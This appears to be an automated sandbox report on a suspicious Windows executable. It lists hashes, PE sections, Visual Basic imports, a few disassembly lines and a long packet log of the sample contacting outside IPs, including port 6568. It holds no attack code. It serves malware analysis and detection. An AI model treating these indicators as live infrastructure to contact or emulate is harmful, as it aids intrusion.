                                                                                                                                                                                Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                                File type:MS-DOS executable, MZ for MS-DOS
                                                                                                                                                                                Entropy (8bit):7.983266251122014
                                                                                                                                                                                TrID:
                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                File name:sJ9Q8UWMAX.exe
                                                                                                                                                                                File size:3987229
                                                                                                                                                                                MD5:7fdb00c80f0250575a05601c08627d50
                                                                                                                                                                                SHA1:709a67ee148978a05bb3c3b530d68004c1eb5196
                                                                                                                                                                                SHA256:5d47d5ad88c5d99cac3a860e682bb9542046e05ee33b3a4fd896db5464e7f0a6
                                                                                                                                                                                SHA512:ffe615bebefcfb6460f48a64b0494787b9f2e02dd445359a6fd374bf21bba04d7e20595f9d285455f47e3f844d3ed8561cd7d29188f1d36d836a4148055aa0af
                                                                                                                                                                                SSDEEP:98304:xJ9toRH4BY81fY8i2k5x2Vy5nkvusNFl0K9xdi:xfee2Gtu/GusNf0axQ
                                                                                                                                                                                TLSH:C9063323AB94043FD81242F075B5C639B9407E710AB99D472BAAFA15A6F3B4337B411F
                                                                                                                                                                                Icon Hash:081669d8d8299628
                                                                                                                                                                                Entrypoint:0x40290c
                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                Digitally signed:false
                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                                DLL Characteristics:
                                                                                                                                                                                Time Stamp:0x51593266 [Mon Apr 1 07:08:22 2013 UTC]
                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                OS Version Major:4
                                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                                File Version Major:4
                                                                                                                                                                                File Version Minor:0
                                                                                                                                                                                Subsystem Version Major:4
                                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                                Import Hash:8c16c795b57934183422be5f6df7d891
                                                                                                                                                                                Instruction
                                                                                                                                                                                push 00403ADCh
                                                                                                                                                                                call 00007F294CC720F3h
                                                                                                                                                                                add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x198f4 | 0x28 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1d000 | 0x13f0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x228 | 0x20 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x220 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x191d4 | 0x1a000 | False | 0.35633263221153844 | data | 5.734799312113526 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.data | 0x1b000 | 0x180c | 0x1000 | False | 0.00634765625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x1d000 | 0x13f0 | 0x2000 | False | 0.1502685546875 | data | 3.550600360706216 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x1d130 | 0xcd0 | dBase IV DBT of @.DBF, block length 3072, next free block index 40, next free block 4232066556, next used block 905723957 | |
RT_GROUP_ICON | 0x1de00 | 0x14 | data | |
RT_VERSION | 0x1de14 | 0x1ec | data | English | United States
RT_MANIFEST | 0x1e000 | 0x3e7 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States

DLL | Import
MSVBVM60.DLL | EVENT_SINK_GetIDsOfNames, _CIcos, _adj_fptan, __vbaStrI4, __vbaVarVargNofree, __vbaFreeVar, __vbaLenBstr, __vbaLateIdCall, __vbaPut3, __vbaEnd, __vbaFreeVarList, _adj_fdiv_m64, EVENT_SINK_Invoke, __vbaRaiseEvent, __vbaFreeObjList, __vbaStrErrVarCopy, _adj_fprem1, __vbaRecAnsiToUni, __vbaCopyBytes, __vbaStrCat, __vbaLsetFixstr, __vbaRecDestruct, __vbaSetSystemError, __vbaHresultCheckObj, __vbaNameFile, _adj_fdiv_m32, Zombie_GetTypeInfo, __vbaAryDestruct, __vbaExitProc, __vbaOnError, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFpR4, __vbaStrFixstr, _CIsin, __vbaChkstk, __vbaFileClose, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaGet3, __vbaStrCmp, __vbaGet4, __vbaPutOwner3, __vbaAryConstruct2, __vbaVarTstEq, __vbaI2I4, DllFunctionCall, __vbaFpUI1, __vbaRedimPreserve, __vbaStrR4, _adj_fpatan, __vbaLateIdCallLd, Zombie_GetTypeInfoCount, __vbaRedim, __vbaRecUniToAnsi, EVENT_SINK_Release, __vbaNew, __vbaUI1I2, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, __vbaStrToUnicode, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaGetOwner3, __vbaUbound, __vbaFileSeek, _CIlog, __vbaErrorOverflow, __vbaFileOpen, __vbaNew2, __vbaInStr, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaI4Var, __vbaAryLock, __vbaVarAdd, __vbaVarDup, __vbaStrToAnsi, __vbaFpI2, __vbaFpI4, __vbaLateMemCallLd, _CIatan, __vbaStrMove, __vbaCastObj, __vbaR8IntI4, _allmul, _CItan, __vbaAryUnlock, _CIexp, __vbaFreeObj, __vbaFreeStr

Language of compilation system | Country where language is spoken | Map
English | United States |

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                Jul 16, 2022 23:57:22.092885971 CEST4977580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:22.120719910 CEST8049775142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:22.120779037 CEST8049775142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:22.120810986 CEST8049775142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:22.120866060 CEST4977580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:22.120892048 CEST4977580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:22.127844095 CEST4977580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:22.128345966 CEST4977580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:22.158389091 CEST8049775142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:22.158479929 CEST4977580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:24.340928078 CEST4979180192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:24.367680073 CEST8049791142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:24.370212078 CEST4979180192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:24.371624947 CEST4979180192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:24.399090052 CEST8049791142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:24.399126053 CEST8049791142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:24.399141073 CEST8049791142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:24.399215937 CEST4979180192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:24.399255991 CEST4979180192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:24.401552916 CEST4979180192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:24.401642084 CEST4979180192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:26.810316086 CEST4980580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:26.838494062 CEST8049805142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:26.838624954 CEST4980580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:26.842829943 CEST4980580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:26.869575024 CEST8049805142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:26.869627953 CEST8049805142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:26.869663000 CEST8049805142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:26.869697094 CEST4980580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:26.869724035 CEST4980580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:26.870358944 CEST4980580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:26.870461941 CEST4980580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:26.898906946 CEST8049805142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:26.898973942 CEST4980580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:27.086255074 CEST49807443192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:57:27.086291075 CEST4434980749.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:27.088084936 CEST49807443192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:57:27.088820934 CEST49807443192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:57:27.088836908 CEST4434980749.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:27.144396067 CEST4434980749.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:27.144514084 CEST49807443192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:57:27.145298004 CEST49807443192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:57:27.145311117 CEST4434980749.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:27.145641088 CEST4434980749.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:27.145721912 CEST49807443192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:57:27.497560978 CEST49807443192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:57:27.555247068 CEST4981080192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:57:27.582046986 CEST804981049.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:27.582139015 CEST4981080192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:57:27.582989931 CEST4981080192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:57:27.609106064 CEST804981049.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:27.611453056 CEST804981049.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:27.611495018 CEST804981049.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:27.611560106 CEST4981080192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:57:27.631666899 CEST4981080192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:57:27.659316063 CEST804981049.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:27.659358978 CEST804981049.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:27.659415960 CEST4981080192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:57:27.998550892 CEST4981080192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:57:28.022267103 CEST804981049.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:28.068332911 CEST498136568192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:57:28.091809034 CEST65684981349.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:28.091933966 CEST498136568192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:57:28.093122005 CEST498136568192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:57:28.116466045 CEST65684981349.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:28.118195057 CEST65684981349.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:28.118237019 CEST65684981349.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:28.118328094 CEST498136568192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:57:28.130727053 CEST498136568192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:57:28.154280901 CEST65684981349.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:28.154354095 CEST65684981349.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:28.154453993 CEST498136568192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:57:28.646300077 CEST498136568192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:57:28.669857979 CEST65684981349.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:29.496061087 CEST4982080192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:29.525816917 CEST8049820142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:29.527712107 CEST4982080192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:29.528261900 CEST4982080192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:29.558032036 CEST8049820142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:29.558214903 CEST8049820142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:29.558394909 CEST4982080192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:29.558530092 CEST8049820142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:29.558582067 CEST4982080192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:29.560656071 CEST4982080192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:29.560672045 CEST4982080192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:29.591238976 CEST8049820142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:29.591353893 CEST4982080192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:33.800137997 CEST4983280192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:33.828110933 CEST8049832142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:33.828211069 CEST4983280192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:33.892160892 CEST4983280192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:33.918677092 CEST8049832142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:33.918724060 CEST8049832142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:33.918744087 CEST8049832142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:33.918807030 CEST4983280192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:33.918864012 CEST4983280192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:33.934715033 CEST4983280192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:33.934757948 CEST4983280192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:40.956829071 CEST4984580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:40.985815048 CEST8049845142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:40.986332893 CEST4984580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:40.987526894 CEST4984580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:41.016335964 CEST8049845142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:41.016365051 CEST8049845142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:41.016396046 CEST8049845142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:41.016458988 CEST4984580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:41.016514063 CEST4984580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:41.017354012 CEST4984580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:41.017386913 CEST4984580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:41.045758963 CEST8049845142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:41.051148891 CEST4984580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:42.433160067 CEST4985180192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:42.460649967 CEST8049851142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:58.199074984 CEST4986880192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:58.199134111 CEST4986880192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:58.226037025 CEST8049868142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:58.226139069 CEST4986880192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:00.878367901 CEST4987180192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:00.905169010 CEST8049871142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:00.905340910 CEST4987180192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:00.906277895 CEST4987180192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:00.932897091 CEST8049871142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:00.932934999 CEST8049871142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:00.932960033 CEST8049871142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:00.933072090 CEST4987180192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:00.934729099 CEST4987180192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:00.934779882 CEST4987180192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:03.626096010 CEST4987280192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:03.653186083 CEST8049872142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:03.653317928 CEST4987280192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:03.656693935 CEST4987280192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:03.683655977 CEST8049872142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:03.683681965 CEST8049872142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:03.683696032 CEST8049872142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:03.683753967 CEST4987280192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:03.683782101 CEST4987280192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:03.692528963 CEST4987280192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:03.693989038 CEST4987280192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:03.719471931 CEST8049872142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:03.719537973 CEST4987280192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:05.808655977 CEST4987380192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:05.835587978 CEST8049873142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:05.835692883 CEST4987380192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:05.836945057 CEST4987380192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:05.863768101 CEST8049873142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:05.863981009 CEST8049873142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:05.864008904 CEST8049873142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:05.864092112 CEST4987380192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:05.864118099 CEST4987380192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:05.867948055 CEST4987380192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:05.867990017 CEST4987380192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:07.128427982 CEST4987480192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:07.155247927 CEST8049874142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:07.155361891 CEST4987480192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:07.158910990 CEST4987480192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:07.185648918 CEST8049874142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:07.186203957 CEST8049874142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:07.186244011 CEST8049874142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:07.186295033 CEST4987480192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:07.186331034 CEST4987480192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:07.205580950 CEST4987480192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:07.205631018 CEST4987480192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:08.585467100 CEST4987580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:08.612966061 CEST8049875142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:08.615356922 CEST4987580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:08.679080009 CEST4987580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:08.708020926 CEST8049875142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:08.708112955 CEST8049875142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:08.708139896 CEST8049875142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:08.708209991 CEST4987580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:08.901561975 CEST4987580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:08.901603937 CEST4987580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:10.938952923 CEST4987680192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:10.965555906 CEST8049876142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:10.965656996 CEST4987680192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:10.971801043 CEST4987680192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:10.998300076 CEST8049876142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:10.998584032 CEST8049876142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:10.998608112 CEST8049876142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:10.998658895 CEST4987680192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:10.998697996 CEST4987680192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:11.038285017 CEST4987680192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:11.038321018 CEST4987680192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:12.286077976 CEST4987780192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:12.312597990 CEST8049877142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:12.312722921 CEST4987780192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:12.329263926 CEST4987780192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:12.355767965 CEST8049877142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:12.355820894 CEST8049877142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:12.355838060 CEST8049877142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:12.355911016 CEST4987780192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:12.356359005 CEST4987780192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:12.356380939 CEST4987780192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:13.623480082 CEST4987980192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:13.650466919 CEST8049879142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:13.650619030 CEST4987980192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:13.655021906 CEST4987980192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:13.681888103 CEST8049879142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:13.681955099 CEST8049879142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:13.682017088 CEST4987980192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:13.682207108 CEST8049879142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:13.682321072 CEST4987980192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:13.682527065 CEST4987980192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:13.682557106 CEST4987980192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:14.999378920 CEST4988080192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:15.026340008 CEST8049880142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:15.026479959 CEST4988080192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:15.027226925 CEST4988080192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:15.062947989 CEST8049880142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:15.063011885 CEST8049880142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:15.063050032 CEST8049880142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:15.063118935 CEST4988080192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:15.063162088 CEST4988080192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:15.069087029 CEST4988080192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:15.069154978 CEST4988080192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:15.101663113 CEST8049880142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:15.103811026 CEST4988080192.168.2.5142.250.102.82
